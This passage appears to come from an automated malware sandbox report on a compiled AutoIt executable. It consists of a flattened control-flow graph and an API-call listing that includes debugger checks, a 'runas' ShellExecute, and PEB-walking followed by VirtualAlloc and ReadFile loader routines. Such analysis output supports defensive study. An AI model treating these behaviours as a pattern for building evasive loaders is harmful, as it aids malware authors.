105962->105998 106001 c16e8f 59 API calls 105962->106001 106002 c3c5c3 342 API calls 105962->106002 106003 c3b53c 342 API calls Mailbox 105962->106003 106005 c393c6 342 API calls Mailbox 105962->106005 105963->105962 105964->105962 106004 c29e4a 90 API calls 4 library calls 105968->106004 105972 c03e25 105972->105899 105973->105899 105975 bc3212 105974->105975 105976 bc31e0 105974->105976 105975->105899 105976->105975 105977 bc3205 IsDialogMessageW 105976->105977 105978 bfcf32 GetClassLongW 105976->105978 105977->105975 105977->105976 105978->105976 105978->105977 105979->105899 105980->105829 105981->105834 105982->105899 105983->105836 105984->105836 105985->105836 105986->105899 105987->105899 
105988->105899 105989->105899 105990->105899 105991->105885 105992->105885 105993->105885 105994->105885 105995->105885 105996->105885 105997->105885 105998->105962 105999->105962 106000->105962 106001->105962 106002->105962 106003->105962 106004->105972 106005->105962 106006->105903 106007->105937 106009 c160e8 106008->106009 106010 c160cb 106008->106010 106009->104544 106010->106009 106012 c160ab 59 API calls Mailbox 106010->106012 106012->106010 106013->104550 106014->104552 106015->104552 106016->104568 106017 bcbe19 106018 bcbe22 106017->106018 106028 bcbaab 106017->106028 106019 bc9837 85 API calls 106018->106019 106027 bcba8b Mailbox 106018->106027 106018->106028 106020 bcbe4d 106019->106020 106021 bcbe5d 106020->106021 106022 c0107b 106020->106022 106023 bc7a51 59 API calls 106021->106023 106032 c17bdb 59 API calls _memmove 106022->106032 106023->106027 106025 c01085 106026 bc8047 59 API calls 106025->106026 106026->106027 106027->106028 106030 c01361 106027->106030 106034 bc8cd4 59 API calls Mailbox 106027->106034 106030->106028 106033 be3d46 59 API calls __wtof_l 106030->106033 106032->106025 106033->106028 106034->106027 106035 be7c56 106036 be7c62 __lseeki64 106035->106036 106072 be9e08 GetStartupInfoW 106036->106072 106038 be7c67 106074 be8b7c GetProcessHeap 106038->106074 106040 be7cbf 106041 be7cca 106040->106041 106157 be7da6 58 API calls 3 library calls 106040->106157 106075 be9ae6 106041->106075 106044 be7cd0 106045 be7cdb __RTC_Initialize 106044->106045 106158 be7da6 58 API calls 3 library calls 106044->106158 106096 bed5d2 106045->106096 106048 be7cea 106049 be7cf6 GetCommandLineW 106048->106049 106159 be7da6 58 API calls 3 library calls 106048->106159 106115 bf4f23 GetEnvironmentStringsW 106049->106115 106052 be7cf5 106052->106049 106055 be7d10 106056 be7d1b 106055->106056 106160 be30b5 58 API calls 3 library calls 106055->106160 106125 bf4d58 106056->106125 106059 be7d21 106060 be7d2c 106059->106060 106161 be30b5 58 API calls 3 library calls 
106059->106161 106139 be30ef 106060->106139 106063 be7d34 106064 be7d3f __wwincmdln 106063->106064 106162 be30b5 58 API calls 3 library calls 106063->106162 106145 bc47d0 106064->106145 106067 be7d53 106068 be7d62 106067->106068 106163 be3358 58 API calls _doexit 106067->106163 106164 be30e0 58 API calls _doexit 106068->106164 106071 be7d67 __lseeki64 106073 be9e1e 106072->106073 106073->106038 106074->106040 106165 be3187 36 API calls 2 library calls 106075->106165 106077 be9aeb 106166 be9d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 106077->106166 106079 be9af0 106080 be9af4 106079->106080 106168 be9d8a TlsAlloc 106079->106168 106167 be9b5c 61 API calls 2 library calls 106080->106167 106083 be9b06 106083->106080 106085 be9b11 106083->106085 106084 be9af9 106084->106044 106169 be87d5 106085->106169 106088 be9b53 106177 be9b5c 61 API calls 2 library calls 106088->106177 106091 be9b32 106091->106088 106093 be9b38 106091->106093 106092 be9b58 106092->106044 106176 be9a33 58 API calls 4 library calls 106093->106176 106095 be9b40 GetCurrentThreadId 106095->106044 106097 bed5de __lseeki64 106096->106097 106098 be9c0b __lock 58 API calls 106097->106098 106099 bed5e5 106098->106099 106100 be87d5 __calloc_crt 58 API calls 106099->106100 106101 bed5f6 106100->106101 106102 bed661 GetStartupInfoW 106101->106102 106103 bed601 __lseeki64 @_EH4_CallFilterFunc@8 106101->106103 106105 bed7a5 106102->106105 106107 bed676 106102->106107 106103->106048 106104 bed86d 106191 bed87d LeaveCriticalSection _doexit 106104->106191 106105->106104 106109 bed7f2 GetStdHandle 106105->106109 106110 bed805 GetFileType 106105->106110 106190 be9e2b InitializeCriticalSectionAndSpinCount 106105->106190 106107->106105 106108 be87d5 __calloc_crt 58 API calls 106107->106108 106112 bed6c4 106107->106112 106108->106107 106109->106105 106110->106105 106111 bed6f8 GetFileType 106111->106112 106112->106105 106112->106111 106189 be9e2b InitializeCriticalSectionAndSpinCount 106112->106189 106116 
be7d06 106115->106116 106117 bf4f34 106115->106117 106121 bf4b1b GetModuleFileNameW 106116->106121 106192 be881d 58 API calls 2 library calls 106117->106192 106119 bf4f5a _memmove 106120 bf4f70 FreeEnvironmentStringsW 106119->106120 106120->106116 106122 bf4b4f _wparse_cmdline 106121->106122 106124 bf4b8f _wparse_cmdline 106122->106124 106193 be881d 58 API calls 2 library calls 106122->106193 106124->106055 106126 bf4d69 106125->106126 106127 bf4d71 __wsetenvp 106125->106127 106126->106059 106128 be87d5 __calloc_crt 58 API calls 106127->106128 106129 bf4d9a __wsetenvp 106128->106129 106129->106126 106131 be87d5 __calloc_crt 58 API calls 106129->106131 106132 bf4df1 106129->106132 106133 bf4e16 106129->106133 106136 bf4e2d 106129->106136 106194 bf4607 58 API calls __wcsnicmp_l 106129->106194 106130 be2d55 _free 58 API calls 106130->106126 106131->106129 106132->106130 106134 be2d55 _free 58 API calls 106133->106134 106134->106126 106195 be8dc6 IsProcessorFeaturePresent 106136->106195 106138 bf4e39 106138->106059 106141 be30fb __IsNonwritableInCurrentImage 106139->106141 106210 bea4d1 106141->106210 106142 be3119 __initterm_e 106143 be2d40 __cinit 67 API calls 106142->106143 106144 be3138 _doexit __IsNonwritableInCurrentImage 106142->106144 106143->106144 106144->106063 106146 bc4889 106145->106146 106147 bc47ea 106145->106147 106146->106067 106148 bc4824 IsThemeActive 106147->106148 106213 be336c 106148->106213 106152 bc4850 106225 bc48fd SystemParametersInfoW SystemParametersInfoW 106152->106225 106154 bc485c 106226 bc3b3a 106154->106226 106156 bc4864 SystemParametersInfoW 106156->106146 106157->106041 106158->106045 106159->106052 106163->106068 106164->106071 106165->106077 106166->106079 106167->106084 106168->106083 106172 be87dc 106169->106172 106171 be8817 106171->106088 106175 be9de6 TlsSetValue 106171->106175 106172->106171 106173 be87fa 106172->106173 106178 bf51f6 106172->106178 106173->106171 106173->106172 106186 bea132 Sleep 106173->106186 
106175->106091 106176->106095 106177->106092 106179 bf5201 106178->106179 106185 bf521c 106178->106185 106180 bf520d 106179->106180 106179->106185 106187 be8b28 58 API calls __getptd_noexit 106180->106187 106181 bf522c HeapAlloc 106184 bf5212 106181->106184 106181->106185 106184->106172 106185->106181 106185->106184 106188 be33a1 DecodePointer 106185->106188 106186->106173 106187->106184 106188->106185 106189->106112 106190->106105 106191->106103 106192->106119 106193->106124 106194->106129 106196 be8dd1 106195->106196 106201 be8c59 106196->106201 106200 be8dec 106200->106138 106202 be8c73 _memset __call_reportfault 106201->106202 106203 be8c93 IsDebuggerPresent 106202->106203 106209 bea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106203->106209 106205 bec5f6 setSBUpLow 6 API calls 106207 be8d7a 106205->106207 106206 be8d57 __call_reportfault 106206->106205 106208 bea140 GetCurrentProcess TerminateProcess 106207->106208 106208->106200 106209->106206 106211 bea4d4 EncodePointer 106210->106211 106211->106211 106212 bea4ee 106211->106212 106212->106142 106214 be9c0b __lock 58 API calls 106213->106214 106215 be3377 DecodePointer EncodePointer 106214->106215 106278 be9d75 LeaveCriticalSection 106215->106278 106217 bc4849 106218 be33d4 106217->106218 106219 be33de 106218->106219 106220 be33f8 106218->106220 106219->106220 106279 be8b28 58 API calls __getptd_noexit 106219->106279 106220->106152 106222 be33e8 106280 be8db6 9 API calls __wcsnicmp_l 106222->106280 106224 be33f3 106224->106152 106225->106154 106227 bc3b47 __ftell_nolock 106226->106227 106228 bc7667 59 API calls 106227->106228 106229 bc3b51 GetCurrentDirectoryW 106228->106229 106281 bc3766 106229->106281 106231 bc3b7a IsDebuggerPresent 106232 bc3b88 106231->106232 106233 bfd272 MessageBoxA 106231->106233 106235 bfd28c 106232->106235 106236 bc3ba5 106232->106236 106265 bc3c61 106232->106265 106233->106235 106234 bc3c68 SetCurrentDirectoryW 106237 bc3c75 Mailbox 106234->106237 106414 bc7213 59 API 
calls Mailbox 106235->106414 106362 bc7285 106236->106362 106237->106156 106240 bfd29c 106245 bfd2b2 SetCurrentDirectoryW 106240->106245 106245->106237 106265->106234 106278->106217 106279->106222 106280->106224 106282 bc7667 59 API calls 106281->106282 106283 bc377c 106282->106283 106416 bc3d31 106283->106416 106285 bc379a 106286 bc4706 61 API calls 106285->106286 106287 bc37ae 106286->106287 106288 bc7de1 59 API calls 106287->106288 106289 bc37bb 106288->106289 106290 bc4ddd 136 API calls 106289->106290 106291 bc37d4 106290->106291 106292 bc37dc Mailbox 106291->106292 106293 bfd173 106291->106293 106296 bc8047 59 API calls 106292->106296 106458 c2955b 106293->106458 106299 bc37ef 106296->106299 106297 bfd192 106298 be2d55 _free 58 API calls 106297->106298 106301 bfd19f 106298->106301 106430 bc928a 106299->106430 106300 bc4e4a 84 API calls 106300->106297 106303 bc4e4a 84 API calls 106301->106303 106305 bfd1a8 106303->106305 106309 bc3ed0 59 API calls 106305->106309 106306 bc7de1 59 API calls 106307 bc3808 106306->106307 106308 bc84c0 69 API calls 106307->106308 106310 bc381a Mailbox 106308->106310 106311 bfd1c3 106309->106311 106312 bc7de1 59 API calls 106310->106312 106313 bc3ed0 59 API calls 106311->106313 106314 bc3840 106312->106314 106315 bfd1df 106313->106315 106316 bc84c0 69 API calls 106314->106316 106317 bc4706 61 API calls 106315->106317 106319 bc384f Mailbox 106316->106319 106318 bfd204 106317->106318 106320 bc3ed0 59 API calls 106318->106320 106322 bc7667 59 API calls 106319->106322 106321 bfd210 106320->106321 106323 bc8047 59 API calls 106321->106323 106324 bc386d 106322->106324 106325 bfd21e 106323->106325 106433 bc3ed0 106324->106433 106327 bc3ed0 59 API calls 106325->106327 106329 bfd22d 106327->106329 106335 bc8047 59 API calls 106329->106335 106331 bc3887 106331->106305 106332 bc3891 106331->106332 106333 be2efd _W_store_winword 60 API calls 106332->106333 106334 bc389c 106333->106334 106334->106311 106336 bc38a6 106334->106336 106337 bfd24f 
106335->106337 106338 be2efd _W_store_winword 60 API calls 106336->106338 106340 bc3ed0 59 API calls 106337->106340 106339 bc38b1 106338->106339 106339->106315 106342 bc38bb 106339->106342 106341 bfd25c 106340->106341 106341->106341 106343 be2efd _W_store_winword 60 API calls 106342->106343 106344 bc38c6 106343->106344 106344->106329 106345 bc3907 106344->106345 106347 bc3ed0 59 API calls 106344->106347 106345->106329 106346 bc3914 106345->106346 106349 bc92ce 59 API calls 106346->106349 106348 bc38ea 106347->106348 106350 bc8047 59 API calls 106348->106350 106351 bc3924 106349->106351 106353 bc38f8 106350->106353 106352 bc9050 59 API calls 106351->106352 106354 bc3932 106352->106354 106355 bc3ed0 59 API calls 106353->106355 106449 bc8ee0 106354->106449 106355->106345 106357 bc394f 106358 bc928a 59 API calls 106357->106358 106359 bc8ee0 60 API calls 106357->106359 106360 bc3ed0 59 API calls 106357->106360 106361 bc3995 Mailbox 106357->106361 106358->106357 106359->106357 106360->106357 106361->106231 106363 bc7292 __ftell_nolock 106362->106363 106364 bc72ab 106363->106364 106365 bfea22 _memset 106363->106365 106366 bc4750 60 API calls 106364->106366 106368 bfea3e GetOpenFileNameW 106365->106368 106367 bc72b4 106366->106367 106498 be0791 106367->106498 106370 bfea8d 106368->106370 106372 bc7bcc 59 API calls 106370->106372 106374 bfeaa2 106372->106374 106374->106374 106375 bc72c9 106516 bc686a 106375->106516 106414->106240 106417 bc3d3e __ftell_nolock 106416->106417 106418 bc7bcc 59 API calls 106417->106418 106429 bc3ea4 Mailbox 106417->106429 106420 bc3d70 106418->106420 106419 bc79f2 59 API calls 106419->106420 106420->106419 106424 bc3da6 Mailbox 106420->106424 106421 bc79f2 59 API calls 106421->106424 106422 bc3e77 106423 bc7de1 59 API calls 106422->106423 106422->106429 106426 bc3e98 106423->106426 106424->106421 106424->106422 106425 bc7de1 59 API calls 106424->106425 106428 bc3f74 59 API calls 106424->106428 106424->106429 106425->106424 106427 bc3f74 59 API 
calls 106426->106427 106427->106429 106428->106424 106429->106285 106431 be0db6 Mailbox 59 API calls 106430->106431 106432 bc37fb 106431->106432 106432->106306 106434 bc3eda 106433->106434 106435 bc3ef3 106433->106435 106436 bc8047 59 API calls 106434->106436 106437 bc7bcc 59 API calls 106435->106437 106438 bc3879 106436->106438 106437->106438 106439 be2efd 106438->106439 106440 be2f7e 106439->106440 106441 be2f09 106439->106441 106495 be2f90 60 API calls 3 library calls 106440->106495 106448 be2f2e 106441->106448 106493 be8b28 58 API calls __getptd_noexit 106441->106493 106443 be2f8b 106443->106331 106445 be2f15 106494 be8db6 9 API calls __wcsnicmp_l 106445->106494 106447 be2f20 106447->106331 106448->106331 106450 bff17c 106449->106450 106455 bc8ef7 106449->106455 106450->106455 106496 bc8bdb 59 API calls Mailbox 106450->106496 106452 bc8ff8 106456 be0db6 Mailbox 59 API calls 106452->106456 106453 bc9040 106454 bc9d3c 60 API calls 106453->106454 106457 bc8fff 106454->106457 106455->106452 106455->106453 106455->106457 106456->106457 106457->106357 106459 bc4ee5 85 API calls 106458->106459 106460 c295ca 106459->106460 106461 c29734 96 API calls 106460->106461 106462 c295dc 106461->106462 106463 bc4f0b 74 API calls 106462->106463 106491 bfd186 106462->106491 106464 c295f7 106463->106464 106465 bc4f0b 74 API calls 106464->106465 106466 c29607 106465->106466 106467 bc4f0b 74 API calls 106466->106467 106468 c29622 106467->106468 106469 bc4f0b 74 API calls 106468->106469 106470 c2963d 106469->106470 106471 bc4ee5 85 API calls 106470->106471 106472 c29654 106471->106472 106473 be571c __crtGetStringTypeA_stat 58 API calls 106472->106473 106474 c2965b 106473->106474 106475 be571c __crtGetStringTypeA_stat 58 API calls 106474->106475 106476 c29665 106475->106476 106477 bc4f0b 74 API calls 106476->106477 106478 c29679 106477->106478 106479 c29109 GetSystemTimeAsFileTime 106478->106479 106480 c2968c 106479->106480 106481 c296a1 106480->106481 106482 c296b6 106480->106482 
106485 be2d55 _free 58 API calls 106481->106485 106483 c2971b 106482->106483 106484 c296bc 106482->106484 106488 be2d55 _free 58 API calls 106483->106488 106497 c28b06 116 API calls __fcloseall 106484->106497 106486 c296a7 106485->106486 106489 be2d55 _free 58 API calls 106486->106489 106488->106491 106489->106491 106490 c29713 106492 be2d55 _free 58 API calls 106490->106492 106491->106297 106491->106300 106492->106491 106493->106445 106494->106447 106495->106443 106496->106455 106497->106490 106499 bf1940 __ftell_nolock 106498->106499 106500 be079e GetLongPathNameW 106499->106500 106501 bc7bcc 59 API calls 106500->106501 106502 bc72bd 106501->106502 106503 bc700b 106502->106503 106504 bc7667 59 API calls 106503->106504 106505 bc701d 106504->106505 106506 bc4750 60 API calls 106505->106506 106507 bc7028 106506->106507 106508 bfe885 106507->106508 106509 bc7033 106507->106509 106514 bfe89f 106508->106514 106556 bc7908 61 API calls 106508->106556 106510 bc3f74 59 API calls 106509->106510 106512 bc703f 106510->106512 106550 bc34c2 106512->106550 106515 bc7052 Mailbox 106515->106375 106517 bc4ddd 136 API calls 106516->106517 106518 bc688f 106517->106518 106519 bfe031 106518->106519 106520 bc4ddd 136 API calls 106518->106520 106521 c2955b 122 API calls 106519->106521 106522 bc68a3 106520->106522 106523 bfe046 106521->106523 106522->106519 106524 bc68ab 106522->106524 106525 bfe04a 106523->106525 106526 bfe067 106523->106526 106528 bc68b7 106524->106528 106529 bfe052 106524->106529 106530 bc4e4a 84 API calls 106525->106530 106527 be0db6 Mailbox 59 API calls 106526->106527 106541 bfe0ac Mailbox 106527->106541 106557 bc6a8c 106528->106557 106655 c242f8 91 API calls _wprintf 106529->106655 106530->106529 106533 bfe060 106533->106526 106535 bfe260 106536 be2d55 _free 58 API calls 106535->106536 106537 bfe268 106536->106537 106538 bc4e4a 84 API calls 106537->106538 106544 bfe271 106538->106544 106539 bc750f 59 API calls 106539->106541 106541->106535 106541->106539 
106541->106544 106547 bc7de1 59 API calls 106541->106547 106649 bc735d 106541->106649 106656 c1f73d 59 API calls 2 library calls 106541->106656 106657 c1f65e 61 API calls 2 library calls 106541->106657 106658 c2737f 59 API calls Mailbox 106541->106658 106543 be2d55 _free 58 API calls 106543->106544 106544->106543 106546 bc4e4a 84 API calls 106544->106546 106659 c1f7a1 90 API calls 4 library calls 106544->106659 106546->106544 106547->106541 106551 bc34d4 106550->106551 106555 bc34f3 _memmove 106550->106555 106553 be0db6 Mailbox 59 API calls 106551->106553 106552 be0db6 Mailbox 59 API calls 106554 bc350a 106552->106554 106553->106555 106554->106515 106555->106552 106556->106508 106558 bfe41e 106557->106558 106559 bc6ab5 106557->106559 106681 c1f7a1 90 API calls 4 library calls 106558->106681 106665 bc57a6 60 API calls Mailbox 106559->106665 106562 bfe431 106682 c1f7a1 90 API calls 4 library calls 106562->106682 106563 bc6ad7 106666 bc57f6 67 API calls 106563->106666 106565 bc6aec 106565->106562 106568 bfe44d 106650 bc7370 106649->106650 106653 bc741e 106649->106653 106651 be0db6 Mailbox 59 API calls 106650->106651 106654 bc73a2 106650->106654 106651->106654 106652 be0db6 59 API calls Mailbox 106652->106654 106653->106541 106654->106652 106654->106653 106655->106533 106656->106541 106657->106541 106658->106541 106659->106544 106665->106563 106666->106565 106681->106562 106682->106568 106736 bc1055 106741 bc2649 106736->106741 106739 be2d40 __cinit 67 API calls 106740 bc1064 106739->106740 106742 bc7667 59 API calls 106741->106742 106743 bc26b7 106742->106743 106748 bc3582 106743->106748 106746 bc2754 106747 bc105a 106746->106747 106751 bc3416 59 API calls 2 library calls 106746->106751 106747->106739 106752 bc35b0 106748->106752 106751->106746 106753 bc35bd 106752->106753 106754 bc35a1 106752->106754 106753->106754 106755 bc35c4 RegOpenKeyExW 106753->106755 106754->106746 106755->106754 106756 bc35de RegQueryValueExW 106755->106756 106757 bc35ff 106756->106757 106758 
bc3614 RegCloseKey 106756->106758 106757->106758 106758->106754 106759 bc1016 106764 bc4974 106759->106764 106762 be2d40 __cinit 67 API calls 106763 bc1025 106762->106763 106765 be0db6 Mailbox 59 API calls 106764->106765 106766 bc497c 106765->106766 106767 bc101b 106766->106767 106771 bc4936 106766->106771 106767->106762 106772 bc493f 106771->106772 106773 bc4951 106771->106773 106774 be2d40 __cinit 67 API calls 106772->106774 106775 bc49a0 106773->106775 106774->106773 106776 bc7667 59 API calls 106775->106776 106777 bc49b8 GetVersionExW 106776->106777 106778 bc7bcc 59 API calls 106777->106778 106779 bc49fb 106778->106779 106780 bc7d2c 59 API calls 106779->106780 106791 bc4a28 106779->106791 106781 bc4a1c 106780->106781 106782 bc7726 59 API calls 106781->106782 106782->106791 106783 bc4a93 GetCurrentProcess IsWow64Process 106784 bc4aac 106783->106784 106786 bc4b2b GetSystemInfo 106784->106786 106787 bc4ac2 106784->106787 106785 bfd864 106788 bc4af8 106786->106788 106799 bc4b37 106787->106799 106788->106767 106791->106783 106791->106785 106792 bc4b1f GetSystemInfo 106794 bc4ae9 106792->106794 106793 bc4ad4 106795 bc4b37 2 API calls 106793->106795 106794->106788 106797 bc4aef FreeLibrary 106794->106797 106796 bc4adc GetNativeSystemInfo 106795->106796 106796->106794 106797->106788 106800 bc4ad0 106799->106800 106801 bc4b40 LoadLibraryA 106799->106801 106800->106792 106800->106793 106801->106800 106802 bc4b51 GetProcAddress 106801->106802 106802->106800 106803 bc3633 106804 bc366a 106803->106804 106805 bc3688 106804->106805 106806 bc36e7 106804->106806 106843 bc36e5 106804->106843 106807 bc374b PostQuitMessage 106805->106807 106808 bc3695 106805->106808 106810 bc36ed 106806->106810 106811 bfd0cc 106806->106811 106835 bc36d8 106807->106835 106813 bfd154 106808->106813 106814 bc36a0 106808->106814 106809 bc36ca DefWindowProcW 106809->106835 106815 bc3715 SetTimer RegisterWindowMessageW 106810->106815 106816 bc36f2 106810->106816 106858 bd1070 10 API calls Mailbox 
106811->106858 106863 c22527 71 API calls _memset 106813->106863 106820 bc36a8 106814->106820 106821 bc3755 106814->106821 106822 bc373e CreatePopupMenu 106815->106822 106815->106835 106817 bfd06f 106816->106817 106818 bc36f9 KillTimer 106816->106818 106830 bfd0a8 MoveWindow 106817->106830 106831 bfd074 106817->106831 106855 bc443a Shell_NotifyIconW _memset 106818->106855 106819 bfd0f3 106859 bd1093 342 API calls Mailbox 106819->106859 106826 bfd139 106820->106826 106827 bc36b3 106820->106827 106848 bc44a0 106821->106848 106822->106835 106826->106809 106862 c17c36 59 API calls Mailbox 106826->106862 106833 bc36be 106827->106833 106834 bfd124 106827->106834 106828 bfd166 106828->106809 106828->106835 106830->106835 106836 bfd078 106831->106836 106837 bfd097 SetFocus 106831->106837 106832 bc370c 106856 bc3114 DeleteObject DestroyWindow Mailbox 106832->106856 106833->106809 106860 bc443a Shell_NotifyIconW _memset 106833->106860 106861 c22d36 81 API calls _memset 106834->106861 106836->106833 106841 bfd081 106836->106841 106837->106835 106857 bd1070 10 API calls Mailbox 106841->106857 106842 bfd134 106842->106835 106843->106809 106846 bfd118 106847 bc434a 68 API calls 106846->106847 106847->106843 106849 bc4539 106848->106849 106850 bc44b7 _memset 106848->106850 106849->106835 106851 bc407c 61 API calls 106850->106851 106854 bc44de 106851->106854 106852 bc4522 KillTimer SetTimer 106852->106849 106853 bfd4ab Shell_NotifyIconW 106853->106852 106854->106852 106854->106853 106855->106832 106856->106835 106857->106835 106858->106819 106859->106833 106860->106846 106861->106842 106862->106843 106863->106828 106864 c0416f 106868 c15fe6 106864->106868 106866 c0417a 106867 c15fe6 86 API calls 106866->106867 106867->106866 106869 c16020 106868->106869 106874 c15ff3 106868->106874 106869->106866 106870 c16022 106880 bc9328 85 API calls Mailbox 106870->106880 106872 c16027 106873 bc9837 85 API calls 106872->106873 106875 c1602e 106873->106875 106874->106869 106874->106870 
106874->106872 106877 c1601a 106874->106877 106876 bc7b2e 59 API calls 106875->106876 106876->106869 106879 bc95a0 59 API calls _wcsstr 106877->106879 106879->106869 106880->106872 106881 c28d0d 106882 c28d20 106881->106882 106883 c28d1a 106881->106883 106885 c28d31 106882->106885 106886 be2d55 _free 58 API calls 106882->106886 106884 be2d55 _free 58 API calls 106883->106884 106884->106882 106887 c28d43 106885->106887 106888 be2d55 _free 58 API calls 106885->106888 106886->106885 106888->106887 106889 f5c360 106903 f59fb0 106889->106903 106891 f5c469 106906 f5c250 106891->106906 106909 f5d490 GetPEB 106903->106909 106905 f5a63b 106905->106891 106907 f5c259 Sleep 106906->106907 106908 f5c267 106907->106908 106910 f5d4ba 106909->106910 106910->106905 106911 bffe27 106924 bdf944 106911->106924 106913 bffe3d 106914 bffebe 106913->106914 106915 bffe53 106913->106915 106918 bcfce0 342 API calls 106914->106918 106933 bc9e5d 60 API calls 106915->106933 106917 bffe92 106919 c0089c 106917->106919 106921 bffe9a 106917->106921 106923 bffeb2 Mailbox 106918->106923 106935 c29e4a 90 API calls 4 library calls 106919->106935 106934 c2834f 59 API calls Mailbox 106921->106934 106923->106923 106925 bdf950 106924->106925 106926 bdf962 106924->106926 106927 bc9d3c 60 API calls 106925->106927 106928 bdf968 106926->106928 106929 bdf991 106926->106929 106932 bdf95a 106927->106932 106931 be0db6 Mailbox 59 API calls 106928->106931 106930 bc9d3c 60 API calls 106929->106930 106930->106932 106931->106932 106932->106913 106933->106917 106934->106923 106935->106923 106936 bc1066 106941 bcf76f 106936->106941 106938 bc106c 106939 be2d40 __cinit 67 API calls 106938->106939 106940 bc1076 106939->106940 106942 bcf790 106941->106942 106974 bdff03 106942->106974 106946 bcf7d7 106947 bc7667 59 API calls 106946->106947 106948 bcf7e1 106947->106948 106949 bc7667 59 API calls 106948->106949 106950 bcf7eb 106949->106950 106951 bc7667 59 API calls 106950->106951 106952 bcf7f5 106951->106952 106953 bc7667 59 
API calls 106952->106953 106954 bcf833 106953->106954 106955 bc7667 59 API calls 106954->106955 106956 bcf8fe 106955->106956 106984 bd5f87 106956->106984 106960 bcf930 106961 bc7667 59 API calls 106960->106961 106962 bcf93a 106961->106962 107012 bdfd9e 106962->107012 106964 bcf981 106965 bcf991 GetStdHandle 106964->106965 106966 bcf9dd 106965->106966 106967 c045ab 106965->106967 106968 bcf9e5 OleInitialize 106966->106968 106967->106966 106969 c045b4 106967->106969 106968->106938 107019 c26b38 64 API calls Mailbox 106969->107019 106971 c045bb 107020 c27207 CreateThread 106971->107020 106973 c045c7 CloseHandle 106973->106968 107021 bdffdc 106974->107021 106977 bdffdc 59 API calls 106978 bdff45 106977->106978 106979 bc7667 59 API calls 106978->106979 106980 bdff51 106979->106980 106981 bc7bcc 59 API calls 106980->106981 106982 bcf796 106981->106982 106983 be0162 6 API calls 106982->106983 106983->106946 106985 bc7667 59 API calls 106984->106985 106986 bd5f97 106985->106986 106987 bc7667 59 API calls 106986->106987 106988 bd5f9f 106987->106988 107028 bd5a9d 106988->107028 106991 bd5a9d 59 API calls 106992 bd5faf 106991->106992 106993 bc7667 59 API calls 106992->106993 106994 bd5fba 106993->106994 106995 be0db6 Mailbox 59 API calls 106994->106995 106996 bcf908 106995->106996 106997 bd60f9 106996->106997 106998 bd6107 106997->106998 106999 bc7667 59 API calls 106998->106999 107000 bd6112 106999->107000 107001 bc7667 59 API calls 107000->107001 107002 bd611d 107001->107002 107003 bc7667 59 API calls 107002->107003 107004 bd6128 107003->107004 107005 bc7667 59 API calls 107004->107005 107006 bd6133 107005->107006 107007 bd5a9d 59 API calls 107006->107007 107008 bd613e 107007->107008 107009 be0db6 Mailbox 59 API calls 107008->107009 107010 bd6145 RegisterWindowMessageW 107009->107010 107010->106960 107013 bdfdae 107012->107013 107014 c1576f 107012->107014 107016 be0db6 Mailbox 59 API calls 107013->107016 107031 c29ae7 60 API calls 107014->107031 107018 bdfdb6 107016->107018 
107017 c1577a 107018->106964 107019->106971 107020->106973 107032 c271ed 65 API calls 107020->107032 107022 bc7667 59 API calls 107021->107022 107023 bdffe7 107022->107023 107024 bc7667 59 API calls 107023->107024 107025 bdffef 107024->107025 107026 bc7667 59 API calls 107025->107026 107027 bdff3b 107026->107027 107027->106977 107029 bc7667 59 API calls 107028->107029 107030 bd5aa5 107029->107030 107030->106991 107031->107017 107033 f5c90b 107034 f5c910 107033->107034 107035 f59fb0 GetPEB 107034->107035 107036 f5c91c 107035->107036 107037 f5c9d0 107036->107037 107038 f5c93a 107036->107038 107055 f5d280 9 API calls 107037->107055 107042 f5c5e0 107038->107042 107041 f5c9b7 107043 f59fb0 GetPEB 107042->107043 107044 f5c67f 107043->107044 107047 f5c6d9 VirtualAlloc 107044->107047 107052 f5c6bd 107044->107052 107053 f5c7e0 CloseHandle 107044->107053 107054 f5c7f0 VirtualFree 107044->107054 107056 f5d4f0 GetPEB 107044->107056 107046 f5c6b0 CreateFileW 107046->107044 107046->107052 107048 f5c6fa ReadFile 107047->107048 107047->107052 107051 f5c718 VirtualAlloc 107048->107051 107048->107052 107049 f5c8cc VirtualFree 107050 f5c8da 107049->107050 107050->107041 107051->107044 107051->107052 107052->107049 107052->107050 107053->107044 107054->107044 107055->107041 107057 f5d51a 107056->107057 107057->107046

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B68
                                                  • IsDebuggerPresent.KERNEL32 ref: 00BC3B7A
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,(l,00C852E0,?,?), ref: 00BC3BEB
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                    • Part of subcall function 00BD092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BC3C14,(l,?,?,?), ref: 00BD096E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C6F
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C77770,00000010), ref: 00BFD281
                                                  • SetCurrentDirectoryW.KERNEL32(?,(l,?,?,?), ref: 00BFD2B9
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C74260,(l,?,?,?), ref: 00BFD33F
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00BFD346
                                                    • Part of subcall function 00BC3A46: GetSysColorBrush.USER32(0000000F), ref: 00BC3A50
                                                    • Part of subcall function 00BC3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A5F
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(00000063), ref: 00BC3A76
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(000000A4), ref: 00BC3A88
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(000000A2), ref: 00BC3A9A
                                                    • Part of subcall function 00BC3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AC0
                                                    • Part of subcall function 00BC3A46: RegisterClassExW.USER32(?), ref: 00BC3B16
                                                    • Part of subcall function 00BC39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A03
                                                    • Part of subcall function 00BC39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A24
                                                    • Part of subcall function 00BC39D5: ShowWindow.USER32(00000000,?,?), ref: 00BC3A38
                                                    • Part of subcall function 00BC39D5: ShowWindow.USER32(00000000,?,?), ref: 00BC3A41
                                                    • Part of subcall function 00BC434A: _memset.LIBCMT ref: 00BC4370
